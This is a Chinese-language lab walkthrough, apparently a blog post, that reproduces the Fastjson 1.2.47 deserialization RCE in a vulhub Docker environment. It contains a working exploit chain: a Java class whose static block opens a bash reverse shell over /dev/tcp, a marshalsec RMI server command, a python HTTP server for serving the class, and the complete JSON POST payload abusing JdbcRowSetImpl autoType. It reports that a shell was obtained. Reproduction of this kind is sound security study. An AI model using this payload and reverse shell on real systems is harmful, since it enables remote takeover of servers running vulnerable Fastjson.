漏洞影响范围
Fastjson < 1.2.48 (<1.2.68?)
环境搭建:
1.拉取docker:
cd /home/kali/桌面/vulhub/fastjson/1.2.47-rce
sudo docker-compose up -d
2.查看docker端口映射信息
sudo docker ps
3.在浏览器中输入http://192.168.5.143:8090/
漏洞复现
探测fastjson版本
抓包修改post提交方式并且添加内容{"@type":"java.lang.AutoCloseable"(显示失败)
新建TouchFile.java文件内容为:
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.5.143/4444 0>&1"});
p.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
然后使用javac 命令对TouchFile.java文件进行编译。(javac TouchFile.java)
2.在kali 中使用python开启http服务
python3 -m http.server 1234
3.使用marshalsec-0.0.3-SNAPSHOT-all.jar
启动一个RMI服务,加载远程类TouchFile.class。
Java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.5.143:1234/#TouchFile" 9988
4.然后在kali上用NC开启端口监听:
5.抓包修改post方式,并且添加下面的内容
POST / HTTP/1.1
Host: 192.168.5.143:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win; x; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 162
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.5.143:9988/TouchFile",
"autoCommit":true
}
6.结果:
并且弹回shell
参考:
https:///weixin_44146996/article/details/111860438?ops_request_misc=%257B%2522request%255Fid%2522%253A%25221499669816780366586530%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=1499669816780366586530&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-111860438.pc_search_result_cache&utm_term=Fastjson1.2.24RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0&spm=1018.2226.3001.4187
